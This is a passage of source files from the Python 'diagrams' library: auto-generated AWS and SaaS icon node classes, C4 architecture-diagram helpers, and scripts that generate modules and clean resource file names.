import _AWS class _Network(_AWS): _type = "network" _icon_dir = "resources/aws/network" class APIGatewayEndpoint(_Network): _icon = "api-gateway-endpoint.png" class APIGateway(_Network): _icon = "api-gateway.png" class AppMesh(_Network): _icon = "app-mesh.png" class ClientVpn(_Network): _icon = "client-vpn.png" class CloudMap(_Network): _icon = "cloud-map.png" class CloudFrontDownloadDistribution(_Network): _icon = "cloudfront-download-distribution.png" class CloudFrontEdgeLocation(_Network): _icon = "cloudfront-edge-location.png" class CloudFrontStreamingDistribution(_Network): _icon = "cloudfront-streaming-distribution.png" class CloudFront(_Network): _icon = "cloudfront.png" class DirectConnect(_Network): _icon = "direct-connect.png" class ElasticLoadBalancing(_Network): _icon = "elastic-load-balancing.png" class ElbApplicationLoadBalancer(_Network): _icon = "elb-application-load-balancer.png" class ElbClassicLoadBalancer(_Network): _icon = "elb-classic-load-balancer.png" class ElbNetworkLoadBalancer(_Network): _icon = "elb-network-load-balancer.png" class Endpoint(_Network): _icon = "endpoint.png" class GlobalAccelerator(_Network): _icon = "global-accelerator.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class Nacl(_Network): _icon = "nacl.png" class NATGateway(_Network): _icon = "nat-gateway.png" class NetworkingAndContentDelivery(_Network): _icon = "networking-and-content-delivery.png" class PrivateSubnet(_Network): _icon = "private-subnet.png" class Privatelink(_Network): _icon = "privatelink.png" class PublicSubnet(_Network): _icon = "public-subnet.png" class Route53HostedZone(_Network): _icon = "route-53-hosted-zone.png" class Route53(_Network): _icon = "route-53.png" class RouteTable(_Network): _icon = "route-table.png" class SiteToSiteVpn(_Network): _icon = "site-to-site-vpn.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class VPCCustomerGateway(_Network): _icon = "vpc-customer-gateway.png" class VPCElasticNetworkAdapter(_Network): _icon = "vpc-elastic-network-adapter.png" class VPCElasticNetworkInterface(_Network): _icon = "vpc-elastic-network-interface.png" class VPCFlowLogs(_Network): _icon = "vpc-flow-logs.png" class VPCPeering(_Network): _icon = "vpc-peering.png" class VPCRouter(_Network): _icon = "vpc-router.png" class VPCTrafficMirroring(_Network): _icon = "vpc-traffic-mirroring.png" class VPC(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CF = CloudFront ELB = ElasticLoadBalancing ALB = ElbApplicationLoadBalancer CLB = ElbClassicLoadBalancer NLB = ElbNetworkLoadBalancer GAX = GlobalAccelerator File: diagrams/aws/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Management(_AWS): _type = "management" _icon_dir = "resources/aws/management" class AutoScaling(_Management): _icon = "auto-scaling.png" class Chatbot(_Management): _icon = "chatbot.png" class CloudformationChangeSet(_Management): _icon = "cloudformation-change-set.png" class CloudformationStack(_Management): _icon = "cloudformation-stack.png" class CloudformationTemplate(_Management): _icon = "cloudformation-template.png" class Cloudformation(_Management): _icon = "cloudformation.png" class Cloudtrail(_Management): _icon = "cloudtrail.png" class CloudwatchAlarm(_Management): _icon = "cloudwatch-alarm.png" class CloudwatchEventEventBased(_Management): _icon = "cloudwatch-event-event-based.png" class CloudwatchEventTimeBased(_Management): _icon = "cloudwatch-event-time-based.png" class CloudwatchRule(_Management): _icon = "cloudwatch-rule.png" class Cloudwatch(_Management): _icon = "cloudwatch.png" class Codeguru(_Management): _icon = "codeguru.png" class CommandLineInterface(_Management): _icon = "command-line-interface.png" class Config(_Management): _icon = "config.png" class ControlTower(_Management): _icon = "control-tower.png" class LicenseManager(_Management): _icon = "license-manager.png" class ManagedServices(_Management): _icon = "managed-services.png" class ManagementAndGovernance(_Management): _icon = "management-and-governance.png" class ManagementConsole(_Management): _icon = "management-console.png" class OpsworksApps(_Management): _icon = "opsworks-apps.png" class OpsworksDeployments(_Management): _icon = "opsworks-deployments.png" class OpsworksInstances(_Management): _icon = "opsworks-instances.png" class OpsworksLayers(_Management): _icon = "opsworks-layers.png" class OpsworksMonitoring(_Management): _icon = "opsworks-monitoring.png" class OpsworksPermissions(_Management): _icon = "opsworks-permissions.png" class OpsworksResources(_Management): _icon = "opsworks-resources.png" class OpsworksStack(_Management): _icon = "opsworks-stack.png" class Opsworks(_Management): _icon = "opsworks.png" class OrganizationsAccount(_Management): _icon = "organizations-account.png" class OrganizationsOrganizationalUnit(_Management): _icon = "organizations-organizational-unit.png" class Organizations(_Management): _icon = "organizations.png" class PersonalHealthDashboard(_Management): _icon = "personal-health-dashboard.png" class ServiceCatalog(_Management): _icon = "service-catalog.png" class SystemsManagerAutomation(_Management): _icon = "systems-manager-automation.png" class SystemsManagerDocuments(_Management): _icon = "systems-manager-documents.png" class SystemsManagerInventory(_Management): _icon = "systems-manager-inventory.png" class SystemsManagerMaintenanceWindows(_Management): _icon = "systems-manager-maintenance-windows.png" class SystemsManagerOpscenter(_Management): _icon = "systems-manager-opscenter.png" class SystemsManagerParameterStore(_Management): _icon = "systems-manager-parameter-store.png" class SystemsManagerPatchManager(_Management): _icon = "systems-manager-patch-manager.png" class SystemsManagerRunCommand(_Management): _icon = "systems-manager-run-command.png" class SystemsManagerStateManager(_Management): _icon = "systems-manager-state-manager.png" class SystemsManager(_Management): _icon = "systems-manager.png" class TrustedAdvisorChecklistCost(_Management): _icon = "trusted-advisor-checklist-cost.png" class TrustedAdvisorChecklistFaultTolerant(_Management): _icon = "trusted-advisor-checklist-fault-tolerant.png" class 
TrustedAdvisorChecklistPerformance(_Management): _icon = "trusted-advisor-checklist-performance.png" class TrustedAdvisorChecklistSecurity(_Management): _icon = "trusted-advisor-checklist-security.png" class TrustedAdvisorChecklist(_Management): _icon = "trusted-advisor-checklist.png" class TrustedAdvisor(_Management): _icon = "trusted-advisor.png" class WellArchitectedTool(_Management): _icon = "well-architected-tool.png" # Aliases SSM = SystemsManager ParameterStore = SystemsManagerParameterStore File: diagrams/aws/ar.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Ar(_AWS): _type = "ar" _icon_dir = "resources/aws/ar" class ArVr(_Ar): _icon = "ar-vr.png" class Sumerian(_Ar): _icon = "sumerian.png" # Aliases File: diagrams/aws/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Blockchain(_AWS): _type = "blockchain" _icon_dir = "resources/aws/blockchain" class BlockchainResource(_Blockchain): _icon = "blockchain-resource.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class ManagedBlockchain(_Blockchain): _icon = "managed-blockchain.png" class QuantumLedgerDatabaseQldb(_Blockchain): _icon = "quantum-ledger-database-qldb.png" # Aliases QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Analytics(_AWS): _type = "analytics" _icon_dir = "resources/aws/analytics" class Analytics(_Analytics): _icon = "analytics.png" class Athena(_Analytics): _icon = "athena.png" class CloudsearchSearchDocuments(_Analytics): _icon = "cloudsearch-search-documents.png" class Cloudsearch(_Analytics): _icon = "cloudsearch.png" class DataLakeResource(_Analytics): _icon = "data-lake-resource.png" class DataPipeline(_Analytics): _icon = "data-pipeline.png" class ElasticsearchService(_Analytics): _icon = "elasticsearch-service.png" class EMRCluster(_Analytics): _icon = "emr-cluster.png" class EMREngineMaprM3(_Analytics): _icon = "emr-engine-mapr-m3.png" class EMREngineMaprM5(_Analytics): _icon = "emr-engine-mapr-m5.png" class EMREngineMaprM7(_Analytics): _icon = "emr-engine-mapr-m7.png" class EMREngine(_Analytics): _icon = "emr-engine.png" class EMRHdfsCluster(_Analytics): _icon = "emr-hdfs-cluster.png" class EMR(_Analytics): _icon = "emr.png" class GlueCrawlers(_Analytics): _icon = "glue-crawlers.png" class GlueDataCatalog(_Analytics): _icon = "glue-data-catalog.png" class Glue(_Analytics): _icon = "glue.png" class KinesisDataAnalytics(_Analytics): _icon = "kinesis-data-analytics.png" class KinesisDataFirehose(_Analytics): _icon = "kinesis-data-firehose.png" class KinesisDataStreams(_Analytics): _icon = "kinesis-data-streams.png" class KinesisVideoStreams(_Analytics): _icon = "kinesis-video-streams.png" class Kinesis(_Analytics): _icon = "kinesis.png" class LakeFormation(_Analytics): _icon = "lake-formation.png" class ManagedStreamingForKafka(_Analytics): _icon = "managed-streaming-for-kafka.png" class Quicksight(_Analytics): _icon = "quicksight.png" class RedshiftDenseComputeNode(_Analytics): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Analytics): _icon = "redshift-dense-storage-node.png" class Redshift(_Analytics): _icon = "redshift.png" # Aliases ES = ElasticsearchService File: diagrams/aws/quantum.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Quantum(_AWS): _type = "quantum" _icon_dir = "resources/aws/quantum" class Braket(_Quantum): _icon = "braket.png" class QuantumTechnologies(_Quantum): _icon = "quantum-technologies.png" # Aliases File: diagrams/aws/cost.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Cost(_AWS): _type = "cost" _icon_dir = "resources/aws/cost" class Budgets(_Cost): _icon = "budgets.png" class CostAndUsageReport(_Cost): _icon = "cost-and-usage-report.png" class CostExplorer(_Cost): _icon = "cost-explorer.png" class CostManagement(_Cost): _icon = "cost-management.png" class ReservedInstanceReporting(_Cost): _icon = "reserved-instance-reporting.png" class SavingsPlans(_Cost): _icon = "savings-plans.png" # Aliases File: diagrams/aws/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Migration(_AWS): _type = "migration" _icon_dir = "resources/aws/migration" class ApplicationDiscoveryService(_Migration): _icon = "application-discovery-service.png" class CloudendureMigration(_Migration): _icon = "cloudendure-migration.png" class DatabaseMigrationService(_Migration): _icon = "database-migration-service.png" class DatasyncAgent(_Migration): _icon = "datasync-agent.png" class Datasync(_Migration): _icon = "datasync.png" class MigrationAndTransfer(_Migration): _icon = "migration-and-transfer.png" class MigrationHub(_Migration): _icon = "migration-hub.png" class ServerMigrationService(_Migration): _icon = "server-migration-service.png" class SnowballEdge(_Migration): _icon = "snowball-edge.png" class Snowball(_Migration): _icon = "snowball.png" class Snowmobile(_Migration): _icon = "snowmobile.png" class TransferForSftp(_Migration): _icon = "transfer-for-sftp.png" # Aliases ADS = ApplicationDiscoveryService CEM = CloudendureMigration DMS = DatabaseMigrationService MAT = MigrationAndTransfer SMS = ServerMigrationService File: diagrams/aws/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Iot(_AWS): _type = "iot" _icon_dir = "resources/aws/iot" class Freertos(_Iot): _icon = "freertos.png" class InternetOfThings(_Iot): _icon = "internet-of-things.png" class Iot1Click(_Iot): _icon = "iot-1-click.png" class IotAction(_Iot): _icon = "iot-action.png" class IotActuator(_Iot): _icon = "iot-actuator.png" class IotAlexaEcho(_Iot): _icon = "iot-alexa-echo.png" class IotAlexaEnabledDevice(_Iot): _icon = "iot-alexa-enabled-device.png" class IotAlexaSkill(_Iot): _icon = "iot-alexa-skill.png" class IotAlexaVoiceService(_Iot): _icon = "iot-alexa-voice-service.png" class IotAnalyticsChannel(_Iot): _icon = "iot-analytics-channel.png" class IotAnalyticsDataSet(_Iot): _icon = "iot-analytics-data-set.png" class IotAnalyticsDataStore(_Iot): _icon = "iot-analytics-data-store.png" class IotAnalyticsNotebook(_Iot): _icon = "iot-analytics-notebook.png" class IotAnalyticsPipeline(_Iot): _icon = "iot-analytics-pipeline.png" class IotAnalytics(_Iot): _icon = "iot-analytics.png" class IotBank(_Iot): _icon = "iot-bank.png" class IotBicycle(_Iot): _icon = "iot-bicycle.png" class IotButton(_Iot): _icon = "iot-button.png" class IotCamera(_Iot): _icon = "iot-camera.png" class IotCar(_Iot): _icon = "iot-car.png" class IotCart(_Iot): _icon = "iot-cart.png" class IotCertificate(_Iot): _icon = "iot-certificate.png" class IotCoffeePot(_Iot): _icon = "iot-coffee-pot.png" class IotCore(_Iot): _icon = "iot-core.png" class IotDesiredState(_Iot): _icon = "iot-desired-state.png" class IotDeviceDefender(_Iot): _icon = "iot-device-defender.png" class IotDeviceGateway(_Iot): _icon = "iot-device-gateway.png" class IotDeviceManagement(_Iot): _icon = "iot-device-management.png" class IotDoorLock(_Iot): _icon = "iot-door-lock.png" class IotEvents(_Iot): _icon = "iot-events.png" class IotFactory(_Iot): _icon = "iot-factory.png" class IotFireTvStick(_Iot): _icon = "iot-fire-tv-stick.png" class IotFireTv(_Iot): _icon = "iot-fire-tv.png" class IotGeneric(_Iot): _icon = "iot-generic.png" class IotGreengrassConnector(_Iot): _icon = "iot-greengrass-connector.png" class IotGreengrass(_Iot): _icon = "iot-greengrass.png" class IotHardwareBoard(_Iot): _icon = "iot-hardware-board.png" class IotHouse(_Iot): _icon = "iot-house.png" class IotHttp(_Iot): _icon = "iot-http.png" class IotHttp2(_Iot): _icon = "iot-http2.png" class IotJobs(_Iot): _icon = "iot-jobs.png" class IotLambda(_Iot): _icon = "iot-lambda.png" class IotLightbulb(_Iot): _icon = "iot-lightbulb.png" class IotMedicalEmergency(_Iot): _icon = "iot-medical-emergency.png" class IotMqtt(_Iot): _icon = "iot-mqtt.png" class IotOverTheAirUpdate(_Iot): _icon = "iot-over-the-air-update.png" class IotPolicyEmergency(_Iot): _icon = "iot-policy-emergency.png" class IotPolicy(_Iot): _icon = "iot-policy.png" class IotReportedState(_Iot): _icon = "iot-reported-state.png" class IotRule(_Iot): _icon = "iot-rule.png" class IotSensor(_Iot): _icon = "iot-sensor.png" class IotServo(_Iot): _icon = "iot-servo.png" class IotShadow(_Iot): _icon = "iot-shadow.png" class IotSimulator(_Iot): _icon = "iot-simulator.png" class IotSitewise(_Iot): _icon = "iot-sitewise.png" class IotThermostat(_Iot): _icon = "iot-thermostat.png" class IotThingsGraph(_Iot): _icon = "iot-things-graph.png" class IotTopic(_Iot): _icon = "iot-topic.png" class IotTravel(_Iot): _icon = "iot-travel.png" class IotUtility(_Iot): _icon = "iot-utility.png" class IotWindfarm(_Iot): _icon = "iot-windfarm.png" # Aliases FreeRTOS = Freertos IotBoard = IotHardwareBoard File: diagrams/aws/general.py # This module is 
automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _General(_AWS): _type = "general" _icon_dir = "resources/aws/general" class Client(_General): _icon = "client.png" class Disk(_General): _icon = "disk.png" class Forums(_General): _icon = "forums.png" class General(_General): _icon = "general.png" class GenericDatabase(_General): _icon = "generic-database.png" class GenericFirewall(_General): _icon = "generic-firewall.png" class GenericOfficeBuilding(_General): _icon = "generic-office-building.png" class GenericSamlToken(_General): _icon = "generic-saml-token.png" class GenericSDK(_General): _icon = "generic-sdk.png" class InternetAlt1(_General): _icon = "internet-alt1.png" class InternetAlt2(_General): _icon = "internet-alt2.png" class InternetGateway(_General): _icon = "internet-gateway.png" class Marketplace(_General): _icon = "marketplace.png" class MobileClient(_General): _icon = "mobile-client.png" class Multimedia(_General): _icon = "multimedia.png" class OfficeBuilding(_General): _icon = "office-building.png" class SamlToken(_General): _icon = "saml-token.png" class SDK(_General): _icon = "sdk.png" class SslPadlock(_General): _icon = "ssl-padlock.png" class TapeStorage(_General): _icon = "tape-storage.png" class Toolkit(_General): _icon = "toolkit.png" class TraditionalServer(_General): _icon = "traditional-server.png" class User(_General): _icon = "user.png" class Users(_General): _icon = "users.png" # Aliases OfficeBuilding = GenericOfficeBuilding File: diagrams/aws/engagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Engagement(_AWS): _type = "engagement" _icon_dir = "resources/aws/engagement" class Connect(_Engagement): _icon = "connect.png" class CustomerEngagement(_Engagement): _icon = "customer-engagement.png" class Pinpoint(_Engagement): _icon = "pinpoint.png" class SimpleEmailServiceSesEmail(_Engagement): _icon = "simple-email-service-ses-email.png" class SimpleEmailServiceSes(_Engagement): _icon = "simple-email-service-ses.png" # Aliases SES = SimpleEmailServiceSes File: diagrams/aws/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Compute(_AWS): _type = "compute" _icon_dir = "resources/aws/compute" class AppRunner(_Compute): _icon = "app-runner.png" class ApplicationAutoScaling(_Compute): _icon = "application-auto-scaling.png" class Batch(_Compute): _icon = "batch.png" class ComputeOptimizer(_Compute): _icon = "compute-optimizer.png" class Compute(_Compute): _icon = "compute.png" class EC2Ami(_Compute): _icon = "ec2-ami.png" class EC2AutoScaling(_Compute): _icon = "ec2-auto-scaling.png" class EC2ContainerRegistryImage(_Compute): _icon = "ec2-container-registry-image.png" class EC2ContainerRegistryRegistry(_Compute): _icon = "ec2-container-registry-registry.png" class EC2ContainerRegistry(_Compute): _icon = "ec2-container-registry.png" class EC2ElasticIpAddress(_Compute): _icon = "ec2-elastic-ip-address.png" class EC2ImageBuilder(_Compute): _icon = "ec2-image-builder.png" class EC2Instance(_Compute): _icon = "ec2-instance.png" class EC2Instances(_Compute): _icon = "ec2-instances.png" class EC2Rescue(_Compute): _icon = "ec2-rescue.png" class EC2SpotInstance(_Compute): _icon = "ec2-spot-instance.png" class EC2(_Compute): _icon = "ec2.png" class ElasticBeanstalkApplication(_Compute): _icon = "elastic-beanstalk-application.png" class ElasticBeanstalkDeployment(_Compute): _icon = "elastic-beanstalk-deployment.png" class ElasticBeanstalk(_Compute): _icon = "elastic-beanstalk.png" class ElasticContainerServiceContainer(_Compute): _icon = "elastic-container-service-container.png" class ElasticContainerServiceService(_Compute): _icon = "elastic-container-service-service.png" class ElasticContainerService(_Compute): _icon = "elastic-container-service.png" class ElasticKubernetesService(_Compute): _icon = "elastic-kubernetes-service.png" class Fargate(_Compute): _icon = "fargate.png" class LambdaFunction(_Compute): _icon = "lambda-function.png" class Lambda(_Compute): _icon = "lambda.png" class Lightsail(_Compute): _icon = "lightsail.png" class LocalZones(_Compute): _icon = "local-zones.png" class Outposts(_Compute): _icon = "outposts.png" class ServerlessApplicationRepository(_Compute): _icon = "serverless-application-repository.png" class ThinkboxDeadline(_Compute): _icon = "thinkbox-deadline.png" class ThinkboxDraft(_Compute): _icon = "thinkbox-draft.png" class ThinkboxFrost(_Compute): _icon = "thinkbox-frost.png" class ThinkboxKrakatoa(_Compute): _icon = "thinkbox-krakatoa.png" class ThinkboxSequoia(_Compute): _icon = "thinkbox-sequoia.png" class ThinkboxStoke(_Compute): _icon = "thinkbox-stoke.png" class ThinkboxXmesh(_Compute): _icon = "thinkbox-xmesh.png" class VmwareCloudOnAWS(_Compute): _icon = "vmware-cloud-on-aws.png" class Wavelength(_Compute): _icon = "wavelength.png" # Aliases AutoScaling = ApplicationAutoScaling AMI = EC2Ami ECR = EC2ContainerRegistry EB = ElasticBeanstalk ECS = ElasticContainerService EKS = ElasticKubernetesService SAR = ServerlessApplicationRepository File: diagrams/c4/__init__.py """ A set of nodes and edges to visualize software architecture using the C4 model. 
""" import html import textwrap from diagrams import Cluster, Node, Edge def _format_node_label(name, key, description): """Create a graphviz label string for a C4 node""" title = f'<font point-size="12"><b>{html.escape(name)}</b></font><br/>' subtitle = f'<font point-size="9">[{html.escape(key)}]<br/></font>' if key else "" text = f'<br/><font point-size="10">{_format_description(description)}</font>' if description else "" return f"<{title}{subtitle}{text}>" def _format_description(description): """ Formats the description string so it fits into the C4 nodes. It line-breaks the description so it fits onto exactly three lines. If there are more than three lines, all further lines are discarded and "..." inserted on the last line to indicate that it was shortened. This will also html-escape the description so it can safely be included in a HTML label. """ wrapper = textwrap.TextWrapper(width=40, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] lines += [""] * (3 - len(lines)) # fill up with empty lines so it is always three return "<br/>".join(lines) def _format_edge_label(description): """Create a graphviz label string for a C4 edge""" wrapper = textwrap.TextWrapper(width=24, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] text = "<br/>".join(lines) return f'<<font point-size="10">{text}</font>>' def C4Node(name, technology="", description="", type="Container", **kwargs): key = f"{type}: {technology}" if technology else type node_attributes = { "label": _format_node_label(name, key, description), "labelloc": "c", "shape": "rect", "width": "2.6", "height": "1.6", "fixedsize": "true", "style": "filled", "fillcolor": "dodgerblue3", "fontcolor": "white", } # collapse boxes to a smaller form if they don't have a description if not description: node_attributes.update({"width": "2", "height": "1"}) node_attributes.update(kwargs) return Node(**node_attributes) def Container(name, technology="", description="", **kwargs): container_attributes = { "name": name, "technology": technology, "description": description, "type": "Container", } container_attributes.update(kwargs) return C4Node(**container_attributes) def Database(name, technology="", description="", **kwargs): database_attributes = { "name": name, "technology": technology, "description": description, "type": "Database", "shape": "cylinder", "labelloc": "b", } database_attributes.update(kwargs) return C4Node(**database_attributes) def System(name, description="", external=False, **kwargs): system_attributes = { "name": name, "description": description, "type": "External System" if external else "System", "fillcolor": "gray60" if external else "dodgerblue4", } system_attributes.update(kwargs) return C4Node(**system_attributes) def Person(name, description="", external=False, **kwargs): person_attributes = { "name": name, "description": description, "type": "External Person" if external else "Person", "fillcolor": "gray60" if external else "dodgerblue4", "style": "rounded,filled", } person_attributes.update(kwargs) return C4Node(**person_attributes) def SystemBoundary(name, **kwargs): graph_attributes = { "label": html.escape(name), "bgcolor": "white", "margin": "16", "style": "dashed", } graph_attributes.update(kwargs) return Cluster(name, graph_attr=graph_attributes) def Relationship(label="", **kwargs): edge_attributes = { "style": "dashed", "color": "gray60", "label": _format_edge_label(label) if label else "", } edge_attributes.update(kwargs) return Edge(**edge_attributes) 
File: diagrams/custom/__init__.py """ Custom provides the possibility of load an image to be presented as a node. """ from diagrams import Node class Custom(Node): _provider = "custom" _type = "custom" _icon_dir = None fontcolor = "#ffffff" def _load_icon(self): return self._icon def __init__(self, label, icon_path, *args, **kwargs): self._icon = icon_path super().__init__(label, *args, **kwargs) File: diagrams/saas/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Logging(_Saas): _type = "logging" _icon_dir = "resources/saas/logging" class Datadog(_Logging): _icon = "datadog.png" class Newrelic(_Logging): _icon = "newrelic.png" class Papertrail(_Logging): _icon = "papertrail.png" # Aliases DataDog = Datadog NewRelic = Newrelic File: diagrams/saas/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Media(_Saas): _type = "media" _icon_dir = "resources/saas/media" class Cloudinary(_Media): _icon = "cloudinary.png" # Aliases File: diagrams/saas/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Social(_Saas): _type = "social" _icon_dir = "resources/saas/social" class Facebook(_Social): _icon = "facebook.png" class Twitter(_Social): _icon = "twitter.png" # Aliases File: diagrams/saas/filesharing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Filesharing(_Saas): _type = "filesharing" _icon_dir = "resources/saas/filesharing" class Nextcloud(_Filesharing): _icon = "nextcloud.png" # Aliases File: diagrams/saas/__init__.py """ Saas provides a set of general saas services. """ from diagrams import Node class _Saas(Node): _provider = "saas" _icon_dir = "resources/saas" fontcolor = "#ffffff" File: diagrams/saas/recommendation.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Recommendation(_Saas): _type = "recommendation" _icon_dir = "resources/saas/recommendation" class Recombee(_Recommendation): _icon = "recombee.png" # Aliases File: diagrams/saas/chat.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Chat(_Saas): _type = "chat" _icon_dir = "resources/saas/chat" class Discord(_Chat): _icon = "discord.png" class Line(_Chat): _icon = "line.png" class Mattermost(_Chat): _icon = "mattermost.png" class Messenger(_Chat): _icon = "messenger.png" class RocketChat(_Chat): _icon = "rocket-chat.png" class Slack(_Chat): _icon = "slack.png" class Teams(_Chat): _icon = "teams.png" class Telegram(_Chat): _icon = "telegram.png" # Aliases File: diagrams/saas/cdn.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Cdn(_Saas): _type = "cdn" _icon_dir = "resources/saas/cdn" class Akamai(_Cdn): _icon = "akamai.png" class Cloudflare(_Cdn): _icon = "cloudflare.png" class Fastly(_Cdn): _icon = "fastly.png" # Aliases File: diagrams/saas/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Communication(_Saas): _type = "communication" _icon_dir = "resources/saas/communication" class Twilio(_Communication): _icon = "twilio.png" # Aliases File: diagrams/saas/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Saas class _Analytics(_Saas): _type = "analytics" _icon_dir = "resources/saas/analytics" class Dataform(_Analytics): _icon = "dataform.png" class Snowflake(_Analytics): _icon = "snowflake.png" class Stitch(_Analytics): _icon = "stitch.png" # Aliases File: diagrams/saas/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Identity(_Saas): _type = "identity" _icon_dir = "resources/saas/identity" class Auth0(_Identity): _icon = "auth0.png" class Okta(_Identity): _icon = "okta.png" # Aliases File: diagrams/saas/alerting.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Alerting(_Saas): _type = "alerting" _icon_dir = "resources/saas/alerting" class Newrelic(_Alerting): _icon = "newrelic.png" class Opsgenie(_Alerting): _icon = "opsgenie.png" class Pagerduty(_Alerting): _icon = "pagerduty.png" class Pushover(_Alerting): _icon = "pushover.png" class Xmatters(_Alerting): _icon = "xmatters.png" # Aliases File: diagrams/base/__init__.py """ Base provides a set of general services for backend infrastructure. """ from diagrams import Node class _Base(Node): _provider = "base" _icon_dir = "resources/base" fontcolor = "#ffffff" File: scripts/generate.py import os import sys from typing import Iterable from jinja2 import Environment, FileSystemLoader, Template, exceptions import config as cfg from . import app_root_dir, doc_root_dir, resource_dir, template_dir, base_dir _usage = "Usage: generate.py <provider>" def load_tmpl(tmpl: str) -> Template: env = Environment(loader=FileSystemLoader(template_dir())) env.filters["up_or_title"] = up_or_title return env.get_template(tmpl) def up_or_title(pvd: str, s: str) -> str: if s in cfg.UPPER_WORDS.get(pvd, ()): return s.upper() if s in cfg.TITLE_WORDS.get(pvd, {}): return cfg.TITLE_WORDS[pvd][s] return s.title() def gen_classes(pvd: str, typ: str, paths: Iterable[str]) -> str: """Generate all service node classes based on resources paths with class templates.""" tmpl = load_tmpl(cfg.TMPL_MODULE) # TODO: extract the gen class metas for sharing # TODO: independent function for generating all pvd/typ/paths pairs def _gen_class_meta(path: str) -> dict: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return {"name": name, "icon": path} metas = map(_gen_class_meta, paths) aliases = cfg.ALIASES[pvd][typ] if typ in cfg.ALIASES[pvd] else {} return tmpl.render(pvd=pvd, typ=typ, metas=metas, aliases=aliases) def gen_apidoc(pvd: str, typ_paths: dict) -> str: try: default_tmp = cfg.TMPL_APIDOC.split('.') tmpl_file = f"{default_tmp[0]}_{pvd}.{default_tmp[1]}" tmpl = load_tmpl(tmpl_file) except exceptions.TemplateNotFound: tmpl = load_tmpl(cfg.TMPL_APIDOC) # TODO: remove def _gen_class_name(path: str) -> str: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return name typ_classes = {} for typ, (paths, resource_root) in sorted(typ_paths.items()): typ_classes[typ] = [] for path in paths: name = _gen_class_name(path) resource_path = os.path.join(resource_root, path) alias = cfg.ALIASES[pvd].get(typ, {}).get(name) typ_classes[typ].append({"name": name, "alias": alias, "resource_path": resource_path}) return tmpl.render(pvd=pvd, typ_classes=typ_classes) def make_module(pvd: str, typ: str, classes: str) -> None: """Create a module file""" mod_path = os.path.join(app_root_dir(pvd), f"{typ}.py") with open(mod_path, "w+") as f: f.write(classes) def make_apidoc(pvd: str, content: 
str) -> None: """Create an api documentation file""" mod_path = os.path.join(doc_root_dir(), f"{pvd}.md") with open(mod_path, "w+") as f: f.write(content) def generate(pvd: str) -> None: """Generates a service node classes.""" typ_paths = {} base = base_dir() for root, _, files in os.walk(resource_dir(pvd)): # Extract the names and paths from resources. files.sort() pngs = list(filter(lambda f: f.endswith(".png"), files)) paths = list(filter(lambda f: "rounded" not in f, pngs)) # Skip the top-root directory. typ = os.path.basename(root) if typ == pvd: continue resource_root = os.path.relpath(root, base) classes = gen_classes(pvd, typ, paths) make_module(pvd, typ, classes) typ_paths[typ] = (paths, resource_root) # Build API documentation apidoc = gen_apidoc(pvd, typ_paths) make_apidoc(pvd, apidoc) if __name__ == "__main__": pvd = sys.argv[1] if pvd not in cfg.PROVIDERS: sys.exit() generate(pvd) File: scripts/resource.py """ resources.py provides useful tools for resources processing. There are 2 commands available. - clean: clean and unify the resources file names with some rules. - round: generate the rounded images from the original squared images. """ import os import subprocess import sys import config as cfg from . import resource_dir _usage = "Usage: resource.py <cmd> <pvd>" def cleaner_onprem(f): f = f.replace("_", "-") return f.lower() def cleaner_aws(f): f = f.replace("_", "-") f = f.replace("@4x", "") f = f.replace("@5x", "") f = f.replace("2.0", "2-0") f = f.replace("-light-bg4x", "") f = f.replace("-light-bg", "") for p in cfg.FILE_PREFIXES["aws"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_azure(f): f = f.replace("_", "-") f = f.replace("(", "").replace(")", "") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["azure"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_gcp(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["gcp"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_ibm(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["ibm"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_firebase(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["firebase"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_k8s(f): f = f.replace("-256", "") for p in 